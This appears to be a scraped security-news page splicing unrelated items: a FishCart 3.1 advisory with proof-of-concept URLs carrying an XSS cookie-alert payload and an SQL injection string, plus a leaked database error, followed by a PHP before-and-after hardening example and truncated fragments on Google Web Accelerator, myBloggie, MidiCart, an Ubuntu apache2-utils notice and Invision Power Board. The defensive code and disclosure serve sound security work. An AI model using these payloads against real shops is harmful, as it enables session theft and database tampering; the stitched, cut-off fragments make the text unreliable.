Vendor: FishNet Inc
Vendor Website: http://www.fishnetinc.com
Summary: There are multiple SQL injection and XSS vulnerabilities in FishCart 3.1.
Proof of Concept Exploits:
XSS:
http://example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='"><script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku=
SQL injection:
http://example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION
Database error: Invalid SQL: select count(*) as cnt from
cvsdemo31prod,cvsdemo31prodlang where nzid=1 and nprodsku=prodsku and
prodzid=1 and nprodsku=prodlsku and prodlzid=1 and
prodlid=1prodsku=”’SQL_INJECTION’ and prodlsku=”’SQL_INJECTION’ and
prodzid=1 and prodzid=prodlzid and prodlid=1 and (produseinvq=0 or
(produseinvq=1 and prodinvqty>0))
MySQL Error: 1054 (Unknown column ‘nzid’ in [...]
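The FishCart report above shows display.php concatenating psku into a count query, reflecting nlst into the page, and printing the raw database error (which reveals the schema) to the client. As an added example that is not FishCart's code (the PHP shape of the query is an assumption; only the table and column names come from the leaked error), here is that pattern beside a hardened version using mysqli prepared statements, integer validation for zid and lid, HTML encoding of nlst, and error handling that keeps driver messages out of the response:

```php
<?php
// Added illustration, not FishCart's code: the PHP shape is an assumption
// reconstructed from the leaked "Invalid SQL" message; only the table and
// column names come from it. mysqli is put in exception mode for the safe path.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// BEFORE (assumed): request values concatenated into the SQL text, so a quote
// in psku rewrites the query, and the failure path hands the schema to the client.
function countProductsVulnerable(mysqli $db, array $get): int
{
    $sql = "select count(*) as cnt from cvsdemo31prod,cvsdemo31prodlang"
         . " where prodzid=" . $get['zid'] . " and prodlid=" . $get['lid']
         . " and prodsku='" . $get['psku'] . "' and prodlsku='" . $get['psku'] . "'";
    // legacy reporting returns false and die() prints the SQL; strict mode throws
    // an uncaught mysqli_sql_exception instead; either way the detail reaches the user
    $res = $db->query($sql) ?: die('Database error: Invalid SQL: ' . $sql . ' ' . $db->error);
    return (int) $res->fetch_assoc()['cnt'];
}

// AFTER: integers validated, psku bound as a parameter so its quotes never reach
// the SQL parser, and failures logged server-side with a generic client reply.
function countProductsSafe(mysqli $db, array $get): int
{
    $zid = filter_var($get['zid'] ?? null, FILTER_VALIDATE_INT);
    $lid = filter_var($get['lid'] ?? null, FILTER_VALIDATE_INT);
    if ($zid === false || $lid === false) {
        throw new InvalidArgumentException('zid and lid must be integers');
    }
    $psku = (string) ($get['psku'] ?? '');
    $stmt = $db->prepare('select count(*) as cnt from cvsdemo31prod, cvsdemo31prodlang'
        . ' where prodzid=? and prodlid=? and prodsku=? and prodlsku=?');
    $stmt->bind_param('iiss', $zid, $lid, $psku, $psku);
    $stmt->execute();
    return (int) $stmt->get_result()->fetch_assoc()['cnt'];
}

function countProductsForRequest(mysqli $db, array $get): int
{
    try {
        return countProductsSafe($db, $get);
    } catch (mysqli_sql_exception | InvalidArgumentException $e) {
        error_log('display.php: ' . $e->getMessage()); // detail stays in the log
        http_response_code(400);
        exit('Request could not be processed.');       // no SQL, schema or paths
    }
}

// nlst is reflected into the page: encode it for the HTML context at output time.
function renderNlst(string $nlst): string
{
    return htmlspecialchars($nlst, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
```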
Google has introduced a technology designed to make Web sites load faster.
A beta, or test version, of Web Accelerator was introduced via the Google Labs technology incubation site late Wednesday. The tool, which must be downloaded, will tap into the power of Google’s global computer network and thus help sites load faster, according to the [...]
“myBloggie is considered one of the most simple, user-friendliest yet packed-with-features weblog systems available to date. Built using PHP & mySQL, the web's most popular scripting language & database system, enabling myBloggie to be installed on any webserver.”
-) Full Path Disclosure
Thanks to improper sanitization of the post_id parameter, it's possible to show the full path by sending a simple request:
[...]
0x01 - Affected software description:
-------------------------------------
MidiCart is a try-before-you-buy shopping cart software that provides all you need to create, operate, and maintain a professional Internet shop. MidiCart ASP and PHP Shopping Cart is an extremely easy to use, flexible, powerful and affordable e-commerce solution for your web site.
0x02 - Vulnerability Description:
---------------------------------
There are several vulnerabilities in MidiCart. First there are some [...]
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
The following packages are affected:
apache2-utils
The problem can be corrected by upgrading the affected package to
version 2.0.50-12ubuntu4.2 (for Ubuntu 4.10) and 2.0.53-5ubuntu5.1
(for Ubuntu 5.04). In general, a standard system upgrade is
sufficient to effect the necessary changes.
Details follow:
Luca Ercoli discovered that the "htdigest" program [...]
Description:
An attacker does not have to be logged in, or even have access
or permission to view the forums in order to exploit this
vulnerability. Users should upgrade immediately.
SQL Injection:
I have discovered a serious SQL Injection issue in Invision Power Board that affects almost all versions of Invision Power Board regardless of most server configurations. Also, because of the fact [...]